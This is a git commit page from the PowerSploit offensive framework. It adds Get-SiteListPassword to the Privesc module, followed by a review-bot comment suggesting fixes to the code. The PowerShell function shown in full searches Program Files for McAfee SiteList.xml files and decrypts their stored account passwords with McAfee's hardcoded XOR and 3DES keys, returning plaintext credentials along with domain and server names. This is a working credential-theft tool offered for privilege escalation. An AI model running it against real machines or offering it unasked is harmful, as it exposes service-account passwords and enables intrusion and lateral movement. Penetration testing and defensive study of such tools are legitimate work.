author | Harmj0y <will@harmj0y.net> | 2016-02-11 21:42:20 -0500 |
---|---|---|
committer | Harmj0y <will@harmj0y.net> | 2016-02-11 21:42:20 -0500 |
commit | 2e6b301170e67938e553e47e9f23353814ea2b3b (patch) | |
tree | 7a82ed2714e436b985df4e6b02c8e52561b3620f /Privesc | |
parent | aea2eacd2de516f889872703754404edeb90f644 (diff) | |
download | PowerSploit-2e6b301170e67938e553e47e9f23353814ea2b3b.tar.gz PowerSploit-2e6b301170e67938e553e47e9f23353814ea2b3b.zip |
Added Get-SiteListPassword to decrypt McAfee SiteList.xml file passwords.
Diffstat (limited to 'Privesc')
-rw-r--r-- | Privesc/Get-SiteListPassword.ps1 | 201 | ||||
-rw-r--r-- | Privesc/Privesc.psd1 | 3 |
2 files changed, 203 insertions, 1 deletions
diff --git a/Privesc/Get-SiteListPassword.ps1 b/Privesc/Get-SiteListPassword.ps1
new file mode 100644
index 0000000..7d5f679
--- /dev/null
+++ b/Privesc/Get-SiteListPassword.ps1
@@ -0,0 +1,201 @@
+function Get-SiteListPassword {
+<#
+ .SYNOPSIS
+
+ Retrieves the plaintext passwords for found McAfee's SiteList.xml files.
+ Based on Jerome Nokin (@funoverip)'s Python solution (in links).
+
+ PowerSploit Function: Get-SiteListPassword
+ Original Author: Jerome Nokin (@funoverip)
+ PowerShell Port: @harmj0y
+ License: BSD 3-Clause
+ Required Dependencies: None
+ Optional Dependencies: None
+
+ .PARAMETER SiteListFilePath
+
+ Optional path to a SiteList.xml file.
+
+ .EXAMPLE
+
+ EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
+ UserName :
+ Path : Products/CommonUpdater
+ Name : McAfeeHttp
+ DecPassword : MyStrongPassword!
+ Enabled : 1
+ DomainName :
+ Server : update.nai.com:80
+
+ EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
+ UserName : McAfeeService
+ Path : Repository$
+ Name : Paris
+ DecPassword : MyStrongPassword!
+ Enabled : 1
+ DomainName : companydomain
+ Server : paris001
+
+ EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
+ UserName : McAfeeService
+ Path : Repository$
+ Name : Tokyo
+ DecPassword : MyStrongPassword!
+ Enabled : 1
+ DomainName : companydomain
+ Server : tokyo000
+
+ .LINK
+ https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
+ https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/
+ https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
+#>
+
+ [CmdletBinding()]
+ param(
+ [ValidateScript({Test-Path -Path $_ })]
+ [String]
+ $SiteListFilePath
+ )
+
+ function Get-DecryptedSitelistPassword {
+ # PowerShell adaptation of https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
+ # Original Author: Jerome Nokin (@funoverip / jerome.nokin@gmail.com)
+ # port by @harmj0y
+ [CmdletBinding()]
+ Param (
+ [Parameter(Mandatory = $True)]
+ [String]
+ $B64Pass
+ )
+
+ # make sure the appropriate assemblies are loaded
+ Add-Type -assembly System.Security
+ Add-Type -assembly System.Core
+
+ # declare the encoding/crypto providers we need
+ $Encoding = [System.Text.Encoding]::ASCII
+ $SHA1 = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider
+ $3DES = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider
+
+ # static McAfee key XOR key LOL
+ $XORKey = 0x12,0x15,0x0F,0x10,0x11,0x1C,0x1A,0x06,0x0A,0x1F,0x1B,0x18,0x17,0x16,0x05,0x19
+
+ # xor the input b64 string with the static XOR key
+ $I = 0;
+ $UnXored = [System.Convert]::FromBase64String($B64Pass) | Foreach-Object { $_ -BXor $XORKey[$I++ % $XORKey.Length] }
+
+ # build the static McAfee 3DES key TROLOL
+ $3DESKey = $SHA1.ComputeHash($Encoding.GetBytes('<!@#$%^>')) + ,0x00*4
+
+ # set the options we need
+ $3DES.Mode = 'ECB'
+ $3DES.Padding = 'None'
+ $3DES.IV = ,0x00*8
+ $3DES.Key = $3DESKey
+
+ # decrypt the unXor'ed block
+ $Decrypted = $3DES.CreateDecryptor().TransformFinalBlock($UnXored, 0, $UnXored.Length)
+
+ # ignore the padding for the result
+ $Index = [Array]::IndexOf($Decrypted, [Byte]0)
+ if($Index -ne -1) {
+ $DecryptedPass = $Encoding.GetString($Decrypted[0..($Index-1)])
+ }
+ else {
+ $DecryptedPass = $Encoding.GetString($Decrypted)
+ }
+
+ New-Object -TypeName PSObject -Property @{'Encrypted'=$B64Pass;'Decrypted'=$DecryptedPass}
+ }
+
+ function Get-SitelistFields {
+ [CmdletBinding()]
+ Param (
+ [Parameter(Mandatory = $True)]
+ [String]
+ $Path
+ )
+
+ try {
+ [Xml]$SiteListXml = Get-Content -Path $Path
+
+ if($SiteListXml.InnerXml -Like "*password*") {
+ Write-Verbose "Potential password in found in $Path"
+
+ $SiteListXml.SiteLists.SiteList.HttpSite | Foreach-Object {
+ $Name = $_.Name
+ $Enabled = $_.Enabled
+ $Server = $_.Server
+ $Path = $_.RelativePath
+ $UserName = $_.UserName
+ $PasswordRaw = $_.Password.'#Text'
+
+ try {
+ $PasswordRaw = $_.Password.'#Text'
+
+ # decrypt the base64 password
+ $DecPassword = Get-DecryptedSitelistPassword -B64Pass $PasswordRaw
+
+ #Create custom object to output results
+ $ObjectProperties = @{
+ 'Name' = $_.Name;
+ 'Enabled' = $_.Enabled;
+ 'Server' = $_.Server;
+ 'Path' = $_.RelativePath;
+ 'DomainName' = '';
+ 'UserName' = $_.UserName;
+ 'EncPassword' = $PasswordRaw;
+ 'DecPassword' = $DecPassword.Decrypted;
+ }
+ New-Object -TypeName PSObject -Property $ObjectProperties
+ }
+ catch {
+ Write-Debug "Error parsing HttpSite : $_"
+ }
+ }
+
+ $SiteListXml.SiteLists.SiteList.UNCSite | Foreach-Object {
+ try {
+ $PasswordRaw = $_.Password.'#Text'
+
+ # decrypt the base64 password
+ $DecPassword = Get-DecryptedSitelistPassword -B64Pass $PasswordRaw
+
+ #Create custom object to output results
+ $ObjectProperties = @{
+ 'Name' = $_.Name;
+ 'Enabled' = $_.Enabled;
+ 'Server' = $_.Server;
+ 'Path' = $_.ShareName;
+ 'DomainName' = $_.DomainName;
+ 'UserName' = $_.UserName;
+ 'EncPassword' = $PasswordRaw;
+ 'DecPassword' = $DecPassword.Decrypted;
+ }
+ New-Object -TypeName PSObject -Property $ObjectProperties
+ }
+ catch {
+ Write-Debug "Error parsing UNCSite : $_"
+ }
+ }
+ }
+ }
+ catch {
+ Write-Error $Error[0]
+ }
+ }
+
+ if($SiteListFilePath) {
+ $XmlFiles = Get-ChildItem -Path $SiteListFilePath
+ }
+ else {
+ $XmlFiles = Get-ChildItem -Recurse -Include 'SiteList.xml' -Path 'C:\Program Files\' -ErrorAction SilentlyContinue
+ $XmlFiles += Get-ChildItem -Recurse -Include 'SiteList.xml' -Path 'C:\Program Files (x86)\' -ErrorAction SilentlyContinue
+ }
+
+ $XmlFiles | Where-Object { $_ } | Foreach-Object {
+ Write-Verbose "Parsing SiteList.xml file '$($_.Fullname)'"
+ Get-SitelistFields -Path $_.Fullname
+ }
+}
diff --git a/Privesc/Privesc.psd1 b/Privesc/Privesc.psd1
index 2ccdb8e..9777f2a 100644
--- a/Privesc/Privesc.psd1
+++ b/Privesc/Privesc.psd1
@@ -42,7 +42,8 @@ FunctionsToExport = @(
 'Restore-ServiceBinary',
 'Write-HijackDll',
 'Write-ServiceBinary',
- 'Write-UserAddMSI'
+ 'Write-UserAddMSI',
+ 'Get-SiteListPassword'
 )
 
 # List of all files packaged with this module
|
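Review bot: The null-terminator trimming in Get-DecryptedSitelistPassword mishandles the case where the first decrypted byte is already 0 (an empty password): `$Index` is then 0, `0..($Index-1)` is the descending PowerShell range `0..-1`, and `$Decrypted[0..-1]` returns the first and last bytes instead of nothing, so the function emits a two-byte garbage string rather than an empty one. The same `if/else` collapses into one safe call if the length overload of GetString is used, `$DecryptedPass = $Encoding.GetString($Decrypted, 0, $Index)`, keeping the existing `else` branch for the `-1` case. Separately, the HttpSite loop assigns `$Name`, `$Enabled`, `$Server`, `$Path`, `$UserName` and `$PasswordRaw` before the inner `try` and never reads them (the object is built from `$_` again, and `$PasswordRaw` is reassigned on the next line); `$Path = $_.RelativePath` also shadows the function's `$Path` parameter, so those six lines should be dropped. The `$SHA1` and `$3DES` providers and the `CreateDecryptor()` transform are never disposed; a `try/finally` calling `.Dispose()` on each would avoid leaking a CSP handle per decrypted entry, and the verbose message `"Potential password in found in $Path"` has a stray "in".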